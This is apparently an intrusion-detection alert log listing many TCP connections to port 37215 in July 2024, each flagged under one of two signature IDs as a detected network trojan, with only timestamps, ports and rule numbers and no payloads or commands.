                  Timestamp:07/10/24-08:26:47.877444
                  SID:2835222
                  Source Port:56010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.634002
                  SID:2835222
                  Source Port:42032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.083011
                  SID:2829579
                  Source Port:44438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.422877
                  SID:2835222
                  Source Port:33762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.396105
                  SID:2835222
                  Source Port:49200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.129630
                  SID:2829579
                  Source Port:42490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.559364
                  SID:2829579
                  Source Port:55418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.557067
                  SID:2829579
                  Source Port:34976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.465521
                  SID:2835222
                  Source Port:60844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.433814
                  SID:2829579
                  Source Port:37648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.545437
                  SID:2835222
                  Source Port:38616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.803034
                  SID:2829579
                  Source Port:35918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.843639
                  SID:2835222
                  Source Port:57168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.868554
                  SID:2835222
                  Source Port:36482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.909155
                  SID:2835222
                  Source Port:59072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.877145
                  SID:2835222
                  Source Port:46562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.997172
                  SID:2835222
                  Source Port:50702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.970962
                  SID:2835222
                  Source Port:51660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.105929
                  SID:2835222
                  Source Port:42856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.468333
                  SID:2829579
                  Source Port:40340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.565038
                  SID:2835222
                  Source Port:35056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.426882
                  SID:2835222
                  Source Port:39846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.374952
                  SID:2829579
                  Source Port:41634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.014226
                  SID:2829579
                  Source Port:39776
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:16.994273
                  SID:2835222
                  Source Port:34838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.923272
                  SID:2829579
                  Source Port:40362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.981965
                  SID:2835222
                  Source Port:46944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.834024
                  SID:2829579
                  Source Port:46592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.182366
                  SID:2829579
                  Source Port:37896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.861470
                  SID:2835222
                  Source Port:54984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.855166
                  SID:2835222
                  Source Port:59946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.804179
                  SID:2835222
                  Source Port:34706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.290610
                  SID:2829579
                  Source Port:53030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.831646
                  SID:2829579
                  Source Port:51648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.150804
                  SID:2835222
                  Source Port:40914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.330025
                  SID:2835222
                  Source Port:45718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.532484
                  SID:2829579
                  Source Port:33984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.000608
                  SID:2829579
                  Source Port:57252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.870602
                  SID:2835222
                  Source Port:52574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.175593
                  SID:2829579
                  Source Port:34148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.857933
                  SID:2829579
                  Source Port:48600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.800580
                  SID:2835222
                  Source Port:53796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.388281
                  SID:2835222
                  Source Port:46808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.558738
                  SID:2829579
                  Source Port:38524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.281440
                  SID:2829579
                  Source Port:34458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.099903
                  SID:2835222
                  Source Port:52162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.649292
                  SID:2835222
                  Source Port:53100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.645798
                  SID:2835222
                  Source Port:54684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.813637
                  SID:2829579
                  Source Port:45742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.165723
                  SID:2835222
                  Source Port:57194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.243765
                  SID:2829579
                  Source Port:36696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.427022
                  SID:2835222
                  Source Port:49994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.437394
                  SID:2829579
                  Source Port:47458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.615804
                  SID:2829579
                  Source Port:53078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.865689
                  SID:2835222
                  Source Port:54810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.623346
                  SID:2829579
                  Source Port:59990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.584145
                  SID:2829579
                  Source Port:33642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.644987
                  SID:2835222
                  Source Port:41448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.873718
                  SID:2829579
                  Source Port:55690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.164122
                  SID:2835222
                  Source Port:44958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.974355
                  SID:2835222
                  Source Port:45748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.927826
                  SID:2829579
                  Source Port:53482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.451550
                  SID:2829579
                  Source Port:35986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.857818
                  SID:2829579
                  Source Port:46390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.868751
                  SID:2835222
                  Source Port:50570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.831646
                  SID:2835222
                  Source Port:45728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.578460
                  SID:2835222
                  Source Port:53044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.240752
                  SID:2829579
                  Source Port:43080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.273517
                  SID:2829579
                  Source Port:36958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.594360
                  SID:2835222
                  Source Port:55206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.308630
                  SID:2835222
                  Source Port:51044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.761894
                  SID:2835222
                  Source Port:60998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.962924
                  SID:2835222
                  Source Port:44972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.648834
                  SID:2835222
                  Source Port:48916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.278406
                  SID:2835222
                  Source Port:48776
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.525014
                  SID:2835222
                  Source Port:48276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.488855
                  SID:2829579
                  Source Port:42380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.694487
                  SID:2835222
                  Source Port:59848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.906271
                  SID:2835222
                  Source Port:42628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.590326
                  SID:2835222
                  Source Port:38852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.833957
                  SID:2829579
                  Source Port:39534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.392573
                  SID:2829579
                  Source Port:42400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.427022
                  SID:2835222
                  Source Port:54156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.647269
                  SID:2835222
                  Source Port:38142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.611968
                  SID:2835222
                  Source Port:42390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.137377
                  SID:2829579
                  Source Port:32858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.167666
                  SID:2835222
                  Source Port:39184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.486969
                  SID:2829579
                  Source Port:48540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.603395
                  SID:2829579
                  Source Port:51816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.412388
                  SID:2835222
                  Source Port:44204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.464984
                  SID:2835222
                  Source Port:40002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.164173
                  SID:2835222
                  Source Port:39162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.509281
                  SID:2835222
                  Source Port:40516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.636858
                  SID:2829579
                  Source Port:38408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.063898
                  SID:2829579
                  Source Port:38950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.630985
                  SID:2829579
                  Source Port:58708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.785283
                  SID:2835222
                  Source Port:44642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.938620
                  SID:2829579
                  Source Port:55170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.467844
                  SID:2835222
                  Source Port:52816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.877507
                  SID:2835222
                  Source Port:42764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.997295
                  SID:2829579
                  Source Port:40378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.888154
                  SID:2829579
                  Source Port:33490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.910234
                  SID:2829579
                  Source Port:39012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.020441
                  SID:2829579
                  Source Port:40056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.814735
                  SID:2829579
                  Source Port:46288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.073080
                  SID:2835222
                  Source Port:58258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.535959
                  SID:2829579
                  Source Port:44832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.460856
                  SID:2835222
                  Source Port:33812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.558711
                  SID:2835222
                  Source Port:32882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.728066
                  SID:2835222
                  Source Port:43646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.189218
                  SID:2835222
                  Source Port:54472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.576586
                  SID:2835222
                  Source Port:36964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.837168
                  SID:2829579
                  Source Port:50670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.322377
                  SID:2829579
                  Source Port:57904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.437126
                  SID:2835222
                  Source Port:48572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.027883
                  SID:2835222
                  Source Port:33546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.948537
                  SID:2835222
                  Source Port:47028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.850871
                  SID:2829579
                  Source Port:38058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.956739
                  SID:2829579
                  Source Port:41090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.878785
                  SID:2829579
                  Source Port:45016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.800332
                  SID:2829579
                  Source Port:48146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.147730
                  SID:2829579
                  Source Port:53282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.171305
                  SID:2829579
                  Source Port:55784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.159132
                  SID:2829579
                  Source Port:33156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.811617
                  SID:2829579
                  Source Port:58718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.795320
                  SID:2835222
                  Source Port:45428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.104603
                  SID:2835222
                  Source Port:51248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.661383
                  SID:2835222
                  Source Port:56276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.355050
                  SID:2835222
                  Source Port:45670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.788473
                  SID:2829579
                  Source Port:45968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.804457
                  SID:2835222
                  Source Port:54734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.569542
                  SID:2829579
                  Source Port:59902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.146522
                  SID:2829579
                  Source Port:46860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.567631
                  SID:2829579
                  Source Port:49198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.626418
                  SID:2835222
                  Source Port:35662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.799639
                  SID:2829579
                  Source Port:57024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.794117
                  SID:2829579
                  Source Port:58588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.156575
                  SID:2829579
                  Source Port:51604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.848557
                  SID:2829579
                  Source Port:36454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.861604
                  SID:2829579
                  Source Port:51600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.476492
                  SID:2835222
                  Source Port:57096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.386841
                  SID:2829579
                  Source Port:56206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.562470
                  SID:2829579
                  Source Port:52390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.453868
                  SID:2829579
                  Source Port:56026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.585781
                  SID:2829579
                  Source Port:56830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.839511
                  SID:2835222
                  Source Port:37440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.322726
                  SID:2835222
                  Source Port:39552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.573004
                  SID:2835222
                  Source Port:52286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.525580
                  SID:2835222
                  Source Port:44894
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.691821
                  SID:2835222
                  Source Port:40408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.121816
                  SID:2835222
                  Source Port:60918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.178122
                  SID:2829579
                  Source Port:36418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.543702
                  SID:2835222
                  Source Port:32786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.846444
                  SID:2829579
                  Source Port:43192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.488786
                  SID:2835222
                  Source Port:46476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.524750
                  SID:2835222
                  Source Port:52500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.844780
                  SID:2829579
                  Source Port:53080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.349991
                  SID:2835222
                  Source Port:60520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.932186
                  SID:2829579
                  Source Port:47702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.322019
                  SID:2835222
                  Source Port:44292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.589952
                  SID:2829579
                  Source Port:39406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.622738
                  SID:2829579
                  Source Port:40376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.404948
                  SID:2835222
                  Source Port:53488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.439779
                  SID:2835222
                  Source Port:54136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.512950
                  SID:2829579
                  Source Port:53088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.879957
                  SID:2829579
                  Source Port:45156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.976996
                  SID:2835222
                  Source Port:44216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.139662
                  SID:2829579
                  Source Port:48776
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.602276
                  SID:2835222
                  Source Port:57918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.865409
                  SID:2829579
                  Source Port:34740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.361334
                  SID:2835222
                  Source Port:51898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.583126
                  SID:2829579
                  Source Port:33932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.316362
                  SID:2829579
                  Source Port:35848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.146425
                  SID:2829579
                  Source Port:51162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.723777
                  SID:2829579
                  Source Port:56920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.445058
                  SID:2829579
                  Source Port:48100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.650487
                  SID:2835222
                  Source Port:38966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.689039
                  SID:2835222
                  Source Port:40858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.929842
                  SID:2835222
                  Source Port:49772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.761850
                  SID:2835222
                  Source Port:54328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.295536
                  SID:2829579
                  Source Port:59886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.536379
                  SID:2829579
                  Source Port:34740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.846444
                  SID:2829579
                  Source Port:42010
                  Destination Port:37215
                  Protocol:TCP
